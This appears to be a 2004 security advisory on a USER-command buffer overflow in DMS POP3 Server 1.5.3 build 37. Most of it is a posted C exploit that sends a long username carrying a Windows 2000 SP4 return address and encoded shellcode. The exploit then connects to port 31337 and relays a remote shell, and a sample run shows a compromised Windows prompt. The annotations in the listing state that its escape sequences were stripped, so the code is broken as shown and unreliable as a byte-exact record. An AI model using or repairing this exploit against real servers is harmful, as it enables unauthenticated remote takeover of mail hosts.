Buffer Overflow in Digital Mapping System's POP3 Server
A vulnerability exists in Digital Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could result in the remote execution of arbitrary code on the vulnerable system.
November 23, 2004
Reported November 22, 2004, by Reed Arvin.
VERSIONS AFFECTED
Digital Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 (the only build named in the report).
DESCRIPTION
A vulnerability exists in Digital Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could result in the remote execution of arbitrary code on the vulnerable system. A buffer overflow occurs during the POP3 authentication process when an overly long username is supplied in the USER command. The proof of concept below needs only a single USER line and sends no password, so no valid mailbox credentials are required to reach the overflow. The overflow lets a remote attacker supply a return address and payload of their choosing and so execute arbitrary code on the server.
DEMONSTRATION
The following proof-of-concept code was posted. Its own header credits NoPh0BiA rather than Reed Arvin, to whom this advisory credits the discovery. Note that the listing as reproduced here is lossy: the backslashes have been stripped (the `\x` escapes in RET and the shellcode, and apparently the `'\0'` and `"\r\n"` literals as well) and the `#include` header names are missing, so it is not the byte-exact original and will not compile as shown.
/*
DMS POP3 Remote BufferOverflow Exploit by NoPh0BiA - SECU
no@0x00:~/Exploits/DMS-Exploit$ ./DMS-exploit 10.20.30.2
***DMS POP3 Remote BufferOverflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 110.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 31337.
[x] Connected to: 10.20.30.2 on port 31337.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0, kamalo, kane, schap.
*/
/* Header names were lost in extraction; these are the standard headers
 * for the calls the listing makes (stdio/stdlib/string, POSIX sockets,
 * select(), inet_addr(), bzero()). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 110 /* POP3 service port the overflow string is sent to */
#define RPORT 31337 /* port main() connects back to after sending the payload */
/* Return address hard-coded for a single target build ("win2k sp4" per the
 * original comment); any other build or service pack would need a different
 * value.  NOTE(review): as reproduced here the string reads "x92x0DxFCx7F"
 * with no backslashes, i.e. twelve ASCII characters rather than the four raw
 * bytes the exploit needs -- the escape sequences were evidently lost in
 * extraction. */
#define RET "x92x0DxFCx7F" /*win2k sp4*/
/*
 * Payload appended after the return address by main().  What the code
 * itself does is not described anywhere in the listing; main() connects
 * back to RPORT after sending it, so presumably it starts a listener on
 * that port -- this is not verifiable from the page.
 *
 * NOTE(review): as reproduced here every byte reads "xNN" with no
 * backslash, so the string is 1197 printable ASCII characters rather than
 * the 399 raw bytes (24 lines of 16 plus one of 15) the escape sequences
 * would have encoded.  Do not treat these lines as the original bytes.
 */
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4dx81"
"x59x47x83xebxfcxe2xf4xb1x69x0fx47x4dx81x0ax12x1b"
"xd6xd2x2bx69x99xd2x02x71x0ax0dx42x35x80xb3xccx07"
"x99xd2x1dx6dx80xb2xa4x7fxc8xd2x73xc6x80xb7x76xb2"
"x7dx68x87xe1xb9xb9x33x4ax40x96x4ax4cx46xb2xb5x76"
"xfdx7dx53x38x60xd2x1dx69x80xb2x21xc6x8dx12xccx17"
"x9dx58xacxc6x85xd2x46xa5x6ax5bx76x8dxdex07x1ax16"
"x43x51x47x13xebx69x1ex29x0ax40xccx16x8dxd2x1cx51"
"x0ax42xccx16x89x0ax2fxc3xcfx57xabxb2x57xd0x80xcc"
"x6dx59x46x4dx81x0ex11x1ex08xbcxafx6ax81x59x47xdd"
"x80x59x47xfbx98x41xa0xe9x98x29xaexa8xc8xdfx0exe9"
"x9bx29x80xe9x2cx77xaex94x88xacxeax86x6cxa5x7cx1a"
"xd2x6bx18x7exb3x59x1cxc0xcax79x16xb2x56xd0x98xc4"
"x42xd4x32x59xebx5ex1ex1cxd2xa6x73xc2x7ex0cx43x14"
"x08x5dxc9xafx73x72x60x19x7ex6exb8x18xb1x68x87x1d"
"xd1x09x17x0dxd1x19x17xb2xd4x75xcex8axb0x82x14x1e"
"xe9x5bx47x37xe8xd0xa7x27x91x09x10xb2xd4x7dx14x1a"
"x7ex0cx6fx1exd5x0exb8x18xa1xd0x80x25xc2x14x03x4d"
"x08xbaxc0xb7xb0x99xcax31xa5xf5x2dx58xd8xaaxecxca"
"x7bxdaxabx19x47x1dx63x5dxc5x3fx80x09xa5x65x46x4c"
"x08x25x63x05x08x25x63x01x08x25x63x1dx0cx1dx63x5d"
"xd5x09x16x1cxd0x18x16x04xd0x08x14x1cx7ex2cx47x25"
"xf3xa7xf4x5bx7ex0cx43xb2x51xd0xa1xb2xf4x59x2fxe0"
"x58x5cx89xb2xd4x5dxcex8exebxa6xb8x7bx7ex8axb8x38"
"x81x31xb7xc7x85x06xb8x18x85x68x9cx1ex7ex89x47";
/* Peer address, filled in by conn() on every call; file-scope rather than
 * local for no reason visible here (nothing else reads it). */
struct sockaddr_in hrm;
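/*
 * Write all of len bytes from buf to fd, retrying on short writes.  Gives
 * up silently on a write error (the original ignored write()'s return
 * value entirely, so an error is still not fatal here).
 */
static void write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t w = write(fd, buf, len);
        if (w < 0)
            return;
        buf += w;
        len -= (size_t)w;
    }
}

/*
 * Relay bytes between the caller's terminal (fd 0 / fd 1) and an already
 * connected socket until one side goes away.
 *
 * sock: connected stream socket; closed before returning.
 * Returns only when select() fails.  A closed or failed remote read, or a
 * failed read on stdin, terminates the process with EXIT_FAILURE instead,
 * as in the original.
 */
void shell(int sock)
{
    char buff[1024];

    for (;;) {
        fd_set rset;
        int n;

        /* An fd_set must be cleared before FD_SET, and select() rewrites
         * it on every return.  The original never called FD_ZERO, so the
         * first pass used uninitialised memory and later passes carried
         * stale bits -- select() could report fds that were never set. */
        FD_ZERO(&rset);
        FD_SET(sock, &rset);
        FD_SET(0, &rset);
        if (select(sock + 1, &rset, NULL, NULL, NULL) < 0)
            break;

        if (FD_ISSET(sock, &rset)) {
            n = (int)read(sock, buff, sizeof buff);
            if (n == 0) {
                printf("Connection closed.");
                exit(EXIT_FAILURE);
            } else if (n < 0) {
                perror("read remote");
                exit(EXIT_FAILURE);
            }
            write_all(1, buff, (size_t)n);
        }
        if (FD_ISSET(0, &rset)) {
            n = (int)read(0, buff, sizeof buff);
            if (n <= 0) {
                perror("read user");
                exit(EXIT_FAILURE);
            }
            write_all(sock, buff, (size_t)n);
        }
    }
    close(sock);
}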
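/*
 * Open a TCP connection to ip:p and return the connected socket.
 *
 * ip: IPv4 address in dotted-quad form (no hostname resolution is done).
 * p:  destination port in host byte order.
 *
 * Fills the file-scope sockaddr_in `hrm`, as the original did.  On any
 * failure -- unparsable address, socket(), connect() -- a message is
 * printed and the process exits with EXIT_FAILURE; callers never see an
 * error return.  (The original called exit(0) on a failed connect(),
 * reporting success to the shell.)
 */
int conn(char *ip, int p)
{
    int sockfd;

    /* Zero the whole struct (covers sin_zero) before filling it. */
    memset(&hrm, 0, sizeof hrm);
    hrm.sin_family = AF_INET;
    hrm.sin_port = htons((unsigned short)p);
    hrm.sin_addr.s_addr = inet_addr(ip);
    /* inet_addr() signals a bad address with INADDR_NONE; the original
     * passed that straight to connect(), i.e. a typo in argv[1] became a
     * connection attempt to 255.255.255.255. */
    if (hrm.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad address: %s\n", ip);
        exit(EXIT_FAILURE);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }
    if (connect(sockfd, (struct sockaddr *)&hrm, sizeof hrm) < 0) {
        perror("connect");
        close(sockfd);
        exit(EXIT_FAILURE);
    }
    printf("[x] Connected to: %s on port %d.", ip, p);
    return sockfd;
}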
/*
 * Entry point: build the overflow string, send it as the argument of a
 * single POP3 USER command to the target, then connect back to RPORT and
 * relay a shell over that connection.
 *
 * argv[1] is the target IPv4 address in dotted-quad form (see conn()).
 *
 * NOTE(review): the listing as reproduced here is not byte-exact.  The
 * empty character constant in memset(buffer,'',1554) is not valid C, and
 * RET/shellcode carry no backslashes, so the escape sequences were
 * evidently lost in extraction.  The layout notes below assume the
 * intended 4-byte RET and 399-byte shellcode.
 */
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: IP.");
exit(0);
}
int x,y;
/* Payload layout: 1121 bytes of 'A' filler, the 4-byte return address,
 * 30 bytes of 'B', then the shellcode.  None of the three malloc()
 * results is checked. */
char *buffer=malloc(1554),*A=malloc(1121),*B=malloc(30),*target=argv[1];
printf("***DMS POP3 Remote BufferOverflow exploit by NoPh0BiA.***");
memset(buffer,'',1554);
/* A and B are filled completely, so neither is NUL-terminated; the
 * strcat() calls below read past the end of each allocation until they
 * happen upon a zero byte somewhere in the heap. */
memset(A,0x41,1121);
memset(B,0x42,30);
strcat(buffer,A);
strcat(buffer,RET);
strcat(buffer,B);
/* 1121 + 4 + 30 + 399 = 1554 exactly, so even with the intended bytes the
 * final strcat() writes its terminating NUL one byte past buffer's
 * allocation; with the escape-less text printed here the overrun is far
 * larger. */
strcat(buffer,shellcode);
x = conn(target,PORT);
printf("[x] Sending bad code..");
/* Sent as one USER command; no PASS follows, so no credentials are ever
 * supplied. */
write(x,"USER ",5);
write(x,buffer,strlen(buffer));
/* Two bytes are written from the literal "r": the 'r' and its NUL.  The
 * intended line terminator was presumably "\r\n" (CRLF) before the
 * backslash was lost. */
write(x,"r",2);
printf("done.");
close(x);
/* Fixed delay before the connect-back; presumably to let the payload
 * start listening on RPORT. */
sleep(3);
printf("[x] Trying to connect to: %s on port %d.",target,RPORT);
/* conn() exits the process on failure instead of returning, so this
 * condition is always true when reached. */
if((y=conn(target,RPORT)))
{
printf("[x] 0wn3d!");
shell(y);
}
/* shell() returns only after close()ing its socket itself, so this is a
 * second close() of y. */
close(y);
}
VENDOR RESPONSE
The vendor, Digital Mapping Systems, has released a bulletin and patch to address this vulnerability.
CREDIT
Discovered by Reed Arvin.